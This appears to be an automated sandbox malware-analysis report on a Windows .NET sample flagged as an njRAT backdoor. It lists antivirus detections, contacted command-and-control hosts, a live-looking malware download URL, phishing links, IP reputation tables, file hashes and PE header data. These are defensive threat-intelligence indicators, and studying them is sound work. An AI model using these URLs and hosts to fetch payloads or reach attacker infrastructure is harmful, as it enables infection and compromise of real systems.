              Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer113
              Application Layer Protocol
              Data Encrypted for ImpactServerGather Victim Network Information
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1346678 Sample: bRMW.exe Startdate: 23/11/2023 Architecture: WINDOWS Score: 100 9 textbin.net 2->9 11 pt.textbin.net 2->11 13 0.tcp.sa.ngrok.io 2->13 19 Multi AV Scanner detection for domain / URL 2->19 21 Found malware configuration 2->21 23 Malicious sample detected (through community Yara rule) 2->23 25 10 other signatures 2->25 6 bRMW.exe 16 2 2->6         started        signatures3 process4 dnsIp5 15 textbin.net 148.72.177.212, 443, 49704, 49706 AS-30083-GO-DADDY-COM-LLCUS United States 6->15 17 0.tcp.sa.ngrok.io 18.229.248.167, 11137, 49705, 49707 AMAZON-02US United States 6->17

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              bRMW.exe89%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
              bRMW.exe74%VirustotalBrowse
              bRMW.exe100%AviraTR/Dropper.Gen7
              bRMW.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              0.tcp.sa.ngrok.io14%VirustotalBrowse
              textbin.net12%VirustotalBrowse
              pt.textbin.net10%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://pt.textbin.net100%Avira URL Cloudphishing
              https://pt.textbin.net100%Avira URL Cloudphishing
              https://pt.textbin.net/download/rcd5ihynxw100%Avira URL Cloudmalware
              http://textbin.net100%Avira URL Cloudphishing
              http://textbin.net12%VirustotalBrowse
              https://pt.textbin.net9%VirustotalBrowse
              https://pt.textbin.net/download/rcd5ihynxw10%VirustotalBrowse
              http://pt.textbin.net10%VirustotalBrowse

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              0.tcp.sa.ngrok.io
              18.229.248.167
              truefalseunknown
              textbin.net
              148.72.177.212
              truetrueunknown
              pt.textbin.net
              unknown
              unknowntrueunknown
              NameMaliciousAntivirus DetectionReputation
              https://pt.textbin.net/download/rcd5ihynxwtrue
              • 10%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://pt.textbin.netbRMW.exe, 00000000.00000002.4453788161.0000000003520000.00000004.00000800.00020000.00000000.sdmp, bRMW.exe, 00000000.00000002.4453788161.000000000357B000.00000004.00000800.00020000.00000000.sdmptrue
              • 9%, Virustotal, Browse
              • Avira URL Cloud: phishing
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebRMW.exe, 00000000.00000002.4453788161.00000000033E1000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://pt.textbin.netbRMW.exe, 00000000.00000002.4453788161.000000000357B000.00000004.00000800.00020000.00000000.sdmpfalse
                • 10%, Virustotal, Browse
                • Avira URL Cloud: phishing
                unknown
                http://textbin.netbRMW.exe, 00000000.00000002.4453788161.000000000357B000.00000004.00000800.00020000.00000000.sdmpfalse
                • 12%, Virustotal, Browse
                • Avira URL Cloud: phishing
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                18.229.248.167
                0.tcp.sa.ngrok.ioUnited States
                16509AMAZON-02USfalse
                148.72.177.212
                textbin.netUnited States
                30083AS-30083-GO-DADDY-COM-LLCUStrue
                Joe Sandbox Version:38.0.0 Ammolite
                Analysis ID:1346678
                Start date and time:2023-11-23 01:08:05 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 35s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:4
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:bRMW.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@1/0@3/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 11
                • Number of non-executed functions: 2
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                01:08:56API Interceptor3959365x Sleep call for process: bRMW.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                18.229.248.167x8t0s92DdrMB.exeGet hashmaliciousRemcosBrowse
                  xrLXOb0ukBAK.exeGet hashmaliciousRemcosBrowse
                    bREI.exeGet hashmaliciousRemcosBrowse
                      bREF.exeGet hashmaliciousRemcosBrowse
                        bREJ.exeGet hashmaliciousRemcosBrowse
                          bR0o.exeGet hashmaliciousNjratBrowse
                            bRdP.exeGet hashmaliciousNjratBrowse
                              r9yoXOkPES.exeGet hashmaliciousNjratBrowse
                                89S22heNS4.exeGet hashmaliciousNjratBrowse
                                  bQ5J.exeGet hashmaliciousNjratBrowse
                                    bQ0v.exeGet hashmaliciousNjratBrowse
                                      bQqN.exeGet hashmaliciousNjratBrowse
                                        bQoA.exeGet hashmaliciousNjratBrowse
                                          bQjc.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            bQh9.exeGet hashmaliciousNjratBrowse
                                              bQcb.exeGet hashmaliciousNjratBrowse
                                                bPTV.exeGet hashmaliciousNjratBrowse
                                                  8Epcu3X9YF.exeGet hashmaliciousNjratBrowse
                                                    bPAv.exeGet hashmaliciousNjratBrowse
                                                      bP72.exeGet hashmaliciousNjratBrowse
                                                        148.72.177.212bREM.exeGet hashmaliciousNjratBrowse
                                                          resources.exeGet hashmaliciousAsyncRAT, zgRATBrowse
                                                            MDE_File_Sample_e884aa3aef73b565a49bf50b5026f03df0b71867.zipGet hashmaliciousParallax RAT, RedLine, SectopRATBrowse
                                                              bR0o.exeGet hashmaliciousNjratBrowse
                                                                Go8UUYgt6R.exeGet hashmaliciousVidar, zgRATBrowse
                                                                  bRoC.exeGet hashmaliciousNjratBrowse
                                                                    bQNp.exeGet hashmaliciousNjratBrowse
                                                                      Dinarski_izvod23001101572573100314958220230928pdf.jsGet hashmaliciousUnknownBrowse
                                                                        bQGy.exeGet hashmaliciousNjratBrowse
                                                                          bQ5J.exeGet hashmaliciousNjratBrowse
                                                                            Tender_File88377388398_839937_(1).jsGet hashmaliciousUnknownBrowse
                                                                              bQqN.exeGet hashmaliciousNjratBrowse
                                                                                bQoA.exeGet hashmaliciousNjratBrowse
                                                                                  Required_Aircraft_PN#_List.vbsGet hashmaliciousQuasarBrowse
                                                                                    https://atpscan.global.hornetsecurity.com/index.php?atp_str=JzUnJ0ZmzN1mh5HJGoOHB6kVNdVe4mvQNOH329HWUx7QFd-kCbnpBmNKnfxhXjAr2E4kRxRa8NDv0j8FxsnW3puyMtEeOgqEa0FDYxmlRTGlTOUgec1oEg2ujzxFKLPTNKoBNWyZUNctTsDwAC3QaY9PnHRyoYK0avyZzlcNmS1yiVpuXsSoafn5iCOT6DbEfwSKASVLuss0utjQ0NEvlDJ6686z3lOOs2ObGQDR9Kw3K_iPNKHv0wjfzAq4MgtGobKJ6NpYDTAWSISzRR5q6XHp97SGnEBOOTtcxpv-3fhzz2ALQ3Y6KiwxqVH6h_gRuSJdfHGeI8Dwc189fqx371OaB8AeoKYnpGCWMLxp4ilQzDcAFRaLR_fzLhvwAROqpnpIJf2cH4AhJUojOjojH47ScCaQvpxBbYWIIzo6I_Dcf7lLlzSiCX6Sq6HDek8Get hashmaliciousQuasarBrowse
                                                                                      bQh9.exeGet hashmaliciousNjratBrowse
                                                                                        bQcb.exeGet hashmaliciousNjratBrowse
                                                                                          bPTV.exeGet hashmaliciousNjratBrowse
                                                                                            Document_22_mar.exeGet hashmaliciousUnknownBrowse
                                                                                              Document_22_mar.exeGet hashmaliciousUnknownBrowse
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                textbin.netresources.exeGet hashmaliciousAsyncRAT, zgRATBrowse
                                                                                                • 148.72.177.212
                                                                                                MDE_File_Sample_e884aa3aef73b565a49bf50b5026f03df0b71867.zipGet hashmaliciousParallax RAT, RedLine, SectopRATBrowse
                                                                                                • 148.72.177.212
                                                                                                Go8UUYgt6R.exeGet hashmaliciousVidar, zgRATBrowse
                                                                                                • 148.72.177.212
                                                                                                bP72.exeGet hashmaliciousNjratBrowse
                                                                                                • 172.67.196.83
                                                                                                bPyy.exeGet hashmaliciousNjratBrowse
                                                                                                • 104.21.52.67
                                                                                                0.tcp.sa.ngrok.ioxuKxxBO9y1gH.exeGet hashmaliciousXWormBrowse
                                                                                                • 54.94.248.37
                                                                                                xuKxxBO9y1gH.exeGet hashmaliciousXWormBrowse
                                                                                                • 18.228.115.60
                                                                                                x8t0s92DdrMB.exeGet hashmaliciousRemcosBrowse
                                                                                                • 18.229.146.63
                                                                                                xcYJfxDKL0Sk.exeGet hashmaliciousRemcosBrowse
                                                                                                • 54.94.248.37
                                                                                                xbOnlYALvtUq.exeGet hashmaliciousNjrat, zgRATBrowse
                                                                                                • 18.228.115.60
                                                                                                xrLXOb0ukBAK.exeGet hashmaliciousRemcosBrowse
                                                                                                • 18.229.248.167
                                                                                                bREM.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.228.115.60
                                                                                                bREI.exeGet hashmaliciousRemcosBrowse
                                                                                                • 18.228.115.60
                                                                                                bREF.exeGet hashmaliciousRemcosBrowse
                                                                                                • 18.229.248.167
                                                                                                bREJ.exeGet hashmaliciousRemcosBrowse
                                                                                                • 18.228.115.60
                                                                                                TP5FS5NkvS.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.231.93.153
                                                                                                bR0o.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.229.248.167
                                                                                                bRoC.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.228.115.60
                                                                                                bRdP.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.229.248.167
                                                                                                s1I8Ulbz55.exeGet hashmaliciousNjratBrowse
                                                                                                • 54.94.248.37
                                                                                                KagRCB8ZhQ.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.229.146.63
                                                                                                r9yoXOkPES.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.228.115.60
                                                                                                bQNp.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.228.115.60
                                                                                                bQGy.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.231.93.153
                                                                                                89S22heNS4.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.229.248.167
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                AMAZON-02UShttps://pub-6b5aaf7cd2b347388b7445d2bcff0d21.r2.dev/Security_on_your_card_account.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 52.16.243.40
                                                                                                https://pub-72c39f0fa8e34066a761fbf215e0bcfa.r2.dev/secureonline.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 52.85.247.3
                                                                                                https://www.wvaqo.site/loginGet hashmaliciousUnknownBrowse
                                                                                                • 54.65.50.71
                                                                                                https://trk.klclick3.com/ls/click?upn=ywBj43t9mVZI2hb2gzrWF4bMz7Wfh7oKn-2BKSaxaMVhwlDkzCGgpF52NJfoGHrmcr-2FVGLByUs9bBBzGRnhfv1IYNCLKFsRyeEJgp-2BJkWzRRNeg-2F1NhD-2BM-2BuUP6MdYBFwXZZLT5cjKEeWJvqXcON7lji0czOZx578-2FTJ-2BHGOyiK04-3DP8j__PoPSv5Gw7kvm-2FaTPf5isV0F8OzVemx3-2BMda5lKttFwV5hYNASaBIOvhduvo23ZgN-2F8HqQRRSFyPnwsEPnCA4w6P3MZBb-2Fu7ndoP5jkyHgtN6dOwA89Umc-2FDfjsKJNza7njbbEuTHcBJqWPDB2oOMb79mKCtaWFtUJ1sB97CXpCTZJ6IXUhV6-2BN0KD1G3k3-2FhVSvjN6n77sRbrvW3ysGQm0ZvClDFCSQ4Dcb7GPbDYZ7gnvmRDBhXixKTOeoXGlGB-2Be6FG-2Bs2xFqVz15IbyuYVkXWvER3oQ6wqAmMhlaDCEcujrNn-2Bl4k7WI4tqlgiSQJGet hashmaliciousUnknownBrowse
                                                                                                • 52.85.151.72
                                                                                                https://bafybeiggghz2g3z2auhspgqibetl34b65cqzkrolxrfxrteykwl65zlygy.ipfs.dweb.link/Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 54.69.249.173
                                                                                                https://s3.amazonaws.com/production.jobspeaker.com/processor_jobspeaker_com-jobspeaker/asset/document/92241/Health_Care_Asst.docGet hashmaliciousUnknownBrowse
                                                                                                • 52.216.209.144
                                                                                                Credit11222023.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 108.156.152.114
                                                                                                https://s3.amazonaws.com/production.jobspeaker.com/processor_jobspeaker_com-jobspeaker/asset/document/92241/Health_Care_Asst.docGet hashmaliciousUnknownBrowse
                                                                                                • 52.217.234.168
                                                                                                Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                • 44.227.76.166
                                                                                                http://fixme.itGet hashmaliciousUnknownBrowse
                                                                                                • 54.67.6.72
                                                                                                http://lightenacquired.xyzGet hashmaliciousUnknownBrowse
                                                                                                • 108.128.140.247
                                                                                                https://clk.tradedoubler.com/click?p=278091&a=2933441&g=25348792&url=http%3A%2F%2Finkz.com.au/%2Fallow%2Fks71M0Ti2rXALZi%2F%2F%2F%2FcGF0cmlja0BhbmRhcmlhLmNvbQ==Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                • 35.161.33.140
                                                                                                https://storage.googleapis.com/fedexfr/hreflj.html#?Z289MSZzMT0xNzQzNzkwJnMyPTM2NjgzMjYyNyZzMz1HTEI=Get hashmaliciousPhisherBrowse
                                                                                                • 3.130.184.110
                                                                                                justificante_de_pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                • 52.84.162.24
                                                                                                v5S9SdJgPx.elfGet hashmaliciousMiraiBrowse
                                                                                                • 63.32.217.87
                                                                                                UbaytFXa8M.elfGet hashmaliciousMiraiBrowse
                                                                                                • 54.247.62.1
                                                                                                ccbS3mSC4n.elfGet hashmaliciousMiraiBrowse
                                                                                                • 130.177.7.83
                                                                                                Proforma_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                • 54.67.42.145
                                                                                                https://public-cdn.bambulab.com/upgrade/studio/software/01.07.07.89/b60b436b40/Bambu_Studio_win-v01.07.07.89.exeGet hashmaliciousUnknownBrowse
                                                                                                • 99.84.208.32
                                                                                                VBUXm77rfL.exeGet hashmaliciousNjratBrowse
                                                                                                • 18.157.68.73
                                                                                                AS-30083-GO-DADDY-COM-LLCUSbREM.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                resources.exeGet hashmaliciousAsyncRAT, zgRATBrowse
                                                                                                • 148.72.177.212
                                                                                                MDE_File_Sample_e884aa3aef73b565a49bf50b5026f03df0b71867.zipGet hashmaliciousParallax RAT, RedLine, SectopRATBrowse
                                                                                                • 148.72.177.212
                                                                                                bR0o.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                Go8UUYgt6R.exeGet hashmaliciousVidar, zgRATBrowse
                                                                                                • 148.72.177.212
                                                                                                bRoC.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                bQNp.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                Dinarski_izvod23001101572573100314958220230928pdf.jsGet hashmaliciousUnknownBrowse
                                                                                                • 148.72.177.212
                                                                                                http://educations.com.deGet hashmaliciousUnknownBrowse
                                                                                                • 199.217.116.41
                                                                                                bQGy.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                bQ5J.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                Tender_File88377388398_839937_(1).jsGet hashmaliciousUnknownBrowse
                                                                                                • 148.72.177.212
                                                                                                bQqN.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                bQoA.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                Required_Aircraft_PN#_List.vbsGet hashmaliciousQuasarBrowse
                                                                                                • 148.72.177.212
                                                                                                https://atpscan.global.hornetsecurity.com/index.php?atp_str=JzUnJ0ZmzN1mh5HJGoOHB6kVNdVe4mvQNOH329HWUx7QFd-kCbnpBmNKnfxhXjAr2E4kRxRa8NDv0j8FxsnW3puyMtEeOgqEa0FDYxmlRTGlTOUgec1oEg2ujzxFKLPTNKoBNWyZUNctTsDwAC3QaY9PnHRyoYK0avyZzlcNmS1yiVpuXsSoafn5iCOT6DbEfwSKASVLuss0utjQ0NEvlDJ6686z3lOOs2ObGQDR9Kw3K_iPNKHv0wjfzAq4MgtGobKJ6NpYDTAWSISzRR5q6XHp97SGnEBOOTtcxpv-3fhzz2ALQ3Y6KiwxqVH6h_gRuSJdfHGeI8Dwc189fqx371OaB8AeoKYnpGCWMLxp4ilQzDcAFRaLR_fzLhvwAROqpnpIJf2cH4AhJUojOjojH47ScCaQvpxBbYWIIzo6I_Dcf7lLlzSiCX6Sq6HDek8Get hashmaliciousQuasarBrowse
                                                                                                • 148.72.177.212
                                                                                                bQh9.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                bQcb.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                bPTV.exeGet hashmaliciousNjratBrowse
                                                                                                • 148.72.177.212
                                                                                                file.exeGet hashmaliciousFabookie, PrivateLoader, RedLine, SmokeLoader, TofseeBrowse
                                                                                                • 148.72.158.178
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.PWSX-gen.24530.32631.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader, VidarBrowse
                                                                                                • 148.72.177.212
                                                                                                https://selligenttier.naylorcampaigns.com/track?type=click&enid=ZWFzPTEmbXNpZD0mYXVpZD0mbWFpbGluZ2lkPTYyNDExMiZtZXNzYWdlaWQ9NjI0MTEyJmRhdGFiYXNlaWQ9NjI0MTEyJnNlcmlhbD0xNjgyODQwNyZlbWFpbGlkPVRpbUBFbGV2YXRlZGNnLmNvbSZ1c2VyaWQ9MjExMTg2JnRhcmdldGlkPSZtbj0mZmw9Jm12aWQ9JmV4dHJhPSYmJg==&&&9999&&&https://instantwaspremoval.com.au/neww/review/wx0u21/Z3JhZW1lQGU2aW5jLnBybw==Get hashmaliciousUnknownBrowse
                                                                                                • 148.72.177.212
                                                                                                Commercial_Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                202311218800-INV62009HX66549.scr.exeGet hashmaliciouszgRATBrowse
                                                                                                • 148.72.177.212
                                                                                                SecuriteInfo.com.Win32.PWSX-gen.27953.18773.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                ordref_bomyogeshd_20112023165922.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                DHL_AWB733988905AA.jseGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                PURCHASE_ORDER_#4500082142.jseGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                https://icsta.page.link/rniXGet hashmaliciousUnknownBrowse
                                                                                                • 148.72.177.212
                                                                                                https://qrco.de/beZX4tGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 148.72.177.212
                                                                                                SecuriteInfo.com.Trojan.Inject4.59820.16624.18058.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                https://linkpop.com/custom9392Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                • 148.72.177.212
                                                                                                https://clk.tradedoubler.com/click?p=278091&a=2933441&g=25348792&url=http%3A%2F%2Finkz.com.au/%2Fallow%2Fks71M0Ti2rXALZi%2F%2F%2F%2FcGF0cmlja0BhbmRhcmlhLmNvbQ==Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                • 148.72.177.212
                                                                                                Payments_Copy.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                SecuriteInfo.com.Trojan.Inject4.59820.18239.21451.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                Soft.exeGet hashmaliciousRedLineBrowse
                                                                                                • 148.72.177.212
                                                                                                z38DHLs_Express.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                Soft.exeGet hashmaliciousRedLineBrowse
                                                                                                • 148.72.177.212
                                                                                                LAM_CHUAN_#710036288.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                • 148.72.177.212
                                                                                                No context
                                                                                                No created / dropped files found
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):5.471907395281321
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:bRMW.exe
                                                                                                File size:27'136 bytes
                                                                                                MD5:fa139ae9c858237134267631faea725b
                                                                                                SHA1:47761a9ab45df5ee6cb016252b598906c60b92d9
                                                                                                SHA256:2f8ea8aa8c05d94beedf55231e5a354534d3c8ff9c57e6a78ee58c6d9ed533d9
                                                                                                SHA512:5b1b70ff0cd80a43531697bc712ef19e8886cf09d59eaf861ed49899281380e311f252d9c5c1cae4ac611699a6c9ae1e3b9fe2d4b67f9a4dcde56d608be21c36
                                                                                                SSDEEP:384:LLd6cufEYAA/XgWeyoHzCYe/iBY2OzRLTm3yilqr63+bGtVvGD:fl8AA/6T5e/gsEZVvGD
                                                                                                TLSH:9DC2195D3B908166C2EF2BB006B2DB2502F2E10B5A17EB5F4CD844FA6B773C14D819E5
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....^e.................`...........~... ........@.. ....................................@................................
                                                                                                Icon Hash:00928e8e8686b000
                                                                                                Entrypoint:0x407e1e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x655E94C2 [Wed Nov 22 23:54:42 2023 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x7dc40x57.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x4d8.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x5e240x6000False0.4954020182291667data5.651947071182076IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
